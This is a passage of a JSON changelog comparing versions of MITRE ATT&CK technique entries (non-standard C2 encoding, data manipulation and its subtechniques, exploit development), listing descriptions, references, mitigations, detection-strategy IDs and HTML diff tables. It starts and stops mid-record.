                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-21 18:10:25.277000+00:00\", \"old_value\": \"2025-10-24 17:49:27.237000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) \", \"old_value\": \"Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) \"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"University of Birmingham C2\", \"description\": \"Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.\", \"url\": \"https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf\"}}}",
                    "previous_version": "1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to16__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to16__0\"><a href=\"#difflib_chg_to16__top\">t</a></td><td class=\"diff_header\" id=\"from16_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;encode&nbsp;data&nbsp;with&nbsp;a&nbsp;non-standard&nbsp;data&nbsp;encodin</td><td class=\"diff_next\"><a href=\"#difflib_chg_to16__top\">t</a></td><td class=\"diff_header\" id=\"to16_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;encode&nbsp;data&nbsp;with&nbsp;a&nbsp;non-standard&nbsp;data&nbsp;encodin</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;system&nbsp;to&nbsp;make&nbsp;the&nbsp;content&nbsp;of&nbsp;command&nbsp;and&nbsp;control&nbsp;traffic&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;system&nbsp;to&nbsp;make&nbsp;the&nbsp;content&nbsp;of&nbsp;command&nbsp;and&nbsp;control&nbsp;traffic&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">more&nbsp;difficult&nbsp;to&nbsp;detect.&nbsp;Command&nbsp;and&nbsp;control&nbsp;(C2)&nbsp;informati</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">more&nbsp;difficult&nbsp;to&nbsp;detect.&nbsp;Command&nbsp;and&nbsp;control&nbsp;(C2)&nbsp;informati</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on&nbsp;can&nbsp;be&nbsp;encoded&nbsp;using&nbsp;a&nbsp;non-standard&nbsp;data&nbsp;encoding&nbsp;system&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on&nbsp;can&nbsp;be&nbsp;encoded&nbsp;using&nbsp;a&nbsp;non-standard&nbsp;data&nbsp;encoding&nbsp;system&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">that&nbsp;diverges&nbsp;from&nbsp;existing&nbsp;protocol&nbsp;specifications.&nbsp;Non-sta</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">that&nbsp;diverges&nbsp;from&nbsp;existing&nbsp;protocol&nbsp;specifications.&nbsp;Non-sta</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ndard&nbsp;data&nbsp;encoding&nbsp;schemes&nbsp;may&nbsp;be&nbsp;based&nbsp;on&nbsp;or&nbsp;related&nbsp;to&nbsp;st</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ndard&nbsp;data&nbsp;encoding&nbsp;schemes&nbsp;may&nbsp;be&nbsp;based&nbsp;on&nbsp;or&nbsp;related&nbsp;to&nbsp;st</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">andard&nbsp;data&nbsp;encoding&nbsp;schemes,&nbsp;such&nbsp;as&nbsp;a&nbsp;modified&nbsp;Base64&nbsp;enco</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">andard&nbsp;data&nbsp;encoding&nbsp;schemes,&nbsp;such&nbsp;as&nbsp;a&nbsp;modified&nbsp;Base64&nbsp;enco</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ding&nbsp;for&nbsp;the&nbsp;message&nbsp;body&nbsp;of&nbsp;an&nbsp;HTTP&nbsp;request.(Citation:&nbsp;Wiki</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ding&nbsp;for&nbsp;the&nbsp;message&nbsp;body&nbsp;of&nbsp;an&nbsp;HTTP&nbsp;request.(Citation:&nbsp;Wiki</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">pedia&nbsp;Binary-to-text&nbsp;Encoding)<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Wikipedia&nbsp;Characte</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">pedia&nbsp;Binary-to-text&nbsp;Encoding)(Citation:&nbsp;Wikipedia&nbsp;Character</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;Encoding)&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Encoding)&nbsp;</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1031: Network Intrusion Prevention"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0326: Behavior-chain detection for T1132.002 Data Encoding: Non-Standard Encoding across Windows, Linux, macOS, ESXi"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-02 14:19:22.609000+00:00",
                    "modified": "2026-01-20 15:10:23.526000+00:00",
                    "name": "Data Manipulation",
                    "description": "Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant Beetle Jan 2022) By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "impact"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1565",
                            "external_id": "T1565"
                        },
                        {
                            "source_name": "Sygnia Elephant Beetle Jan 2022",
                            "description": "Sygnia Incident Response Team. (2022, January 5). TG2003: ELEPHANT BEETLE UNCOVERING AN ORGANIZED FINANCIAL-THEFT OPERATION. Retrieved February 9, 2023.",
                            "url": "https://web.archive.org/web/20220105132433/https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_impact_type": [
                        "Integrity"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-20 15:10:23.526000+00:00\", \"old_value\": \"2025-10-24 17:49:13.111000+00:00\"}, \"root['external_references'][1]['url']\": {\"new_value\": \"https://web.archive.org/web/20220105132433/https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf\", \"old_value\": \"https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf?__hstc=147695848.3e8f1a482c8f8d4531507747318e660b.1680005306711.1680005306711.1680005306711.1&__hssc=147695848.1.1680005306711&__hsfp=3000179024&hsCtaTracking=189ec409-ae2d-4909-8bf1-62dcdd694372%7Cca91d317-8f10-4a38-9f80-367f551ad64d\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.1",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1029: Remote Data Storage",
                            "M1030: Network Segmentation",
                            "M1041: Encrypt Sensitive Information"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0059: Detection Strategy for Data Manipulation"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-02 14:30:05.252000+00:00",
                    "modified": "2025-11-13 19:21:05.132000+00:00",
                    "name": "Runtime Data Manipulation",
                    "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "impact"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1565/003",
                            "external_id": "T1565.003"
                        },
                        {
                            "source_name": "DOJ Lazarus Sony 2018",
                            "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.",
                            "url": "https://www.justice.gov/opa/press-release/file/1092091/download"
                        },
                        {
                            "source_name": "FireEye APT38 Oct 2018",
                            "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024.",
                            "url": "https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_impact_type": [
                        "Integrity"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-11-13 19:21:05.132000+00:00\", \"old_value\": \"2025-10-24 17:48:37.277000+00:00\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf\", \"old_value\": \"https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.2",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1030: Network Segmentation"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0391: Detection Strategy for Runtime Data Manipulation."
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-02 14:22:24.410000+00:00",
                    "modified": "2025-11-13 19:21:05.131000+00:00",
                    "name": "Stored Data Manipulation",
                    "description": "Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "impact"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1565/001",
                            "external_id": "T1565.001"
                        },
                        {
                            "source_name": "DOJ Lazarus Sony 2018",
                            "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.",
                            "url": "https://www.justice.gov/opa/press-release/file/1092091/download"
                        },
                        {
                            "source_name": "FireEye APT38 Oct 2018",
                            "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024.",
                            "url": "https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_impact_type": [
                        "Integrity"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-11-13 19:21:05.131000+00:00\", \"old_value\": \"2025-10-24 17:48:29.225000+00:00\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf\", \"old_value\": \"https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.1",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1029: Remote Data Storage",
                            "M1041: Encrypt Sensitive Information"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0193: Detection Strategy for Stored Data Manipulation across OS Platforms."
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-02 14:27:00.693000+00:00",
                    "modified": "2025-11-13 19:21:05.133000+00:00",
                    "name": "Transmitted Data Manipulation",
                    "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "impact"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1565/002",
                            "external_id": "T1565.002"
                        },
                        {
                            "source_name": "DOJ Lazarus Sony 2018",
                            "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.",
                            "url": "https://www.justice.gov/opa/press-release/file/1092091/download"
                        },
                        {
                            "source_name": "FireEye APT38 Oct 2018",
                            "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024.",
                            "url": "https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_impact_type": [
                        "Integrity"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-11-13 19:21:05.133000+00:00\", \"old_value\": \"2025-10-24 17:49:25.162000+00:00\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf\", \"old_value\": \"https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.1",
                    "changelog_mitigations": {
                        "shared": [
                            "M1041: Encrypt Sensitive Information"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0254: Detection Strategy of Transmitted Data Manipulation"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-01 01:48:15.511000+00:00",
                    "modified": "2025-10-24 17:49:17.967000+00:00",
                    "name": "Exploits",
                    "description": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)\n\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "resource-development"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1587/004",
                            "external_id": "T1587.004"
                        },
                        {
                            "source_name": "Irongeek Sims BSides 2017",
                            "description": "Stephen Sims. (2017, April 30). Microsoft Patch Analysis for Exploitation. Retrieved October 16, 2020.",
                            "url": "https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims"
                        },
                        {
                            "source_name": "NYTStuxnet",
                            "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.",
                            "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['description']\": {\"new_value\": \"Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)\\n\\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\\n\\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\", \"old_value\": \"Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)\\n\\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\\n\\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\", \"diff\": \"--- \\n+++ \\n@@ -2,4 +2,4 @@\\n \\n As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\\n \\n-Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\\n+Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Stealth](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).\"}}}",
                    "previous_version": "1.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to36__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to36__0\"><a href=\"#difflib_chg_to36__top\">t</a></td><td class=\"diff_header\" id=\"from36_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;develop&nbsp;exploits&nbsp;that&nbsp;can&nbsp;be&nbsp;used&nbsp;during&nbsp;tar</td><td class=\"diff_next\"><a href=\"#difflib_chg_to36__top\">t</a></td><td class=\"diff_header\" id=\"to36_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;develop&nbsp;exploits&nbsp;that&nbsp;can&nbsp;be&nbsp;used&nbsp;during&nbsp;tar</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">geting.&nbsp;An&nbsp;exploit&nbsp;takes&nbsp;advantage&nbsp;of&nbsp;a&nbsp;bug&nbsp;or&nbsp;vulnerability</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">geting.&nbsp;An&nbsp;exploit&nbsp;takes&nbsp;advantage&nbsp;of&nbsp;a&nbsp;bug&nbsp;or&nbsp;vulnerability</td></tr>\n            <tr><td class=\"diff_next\"></td><td 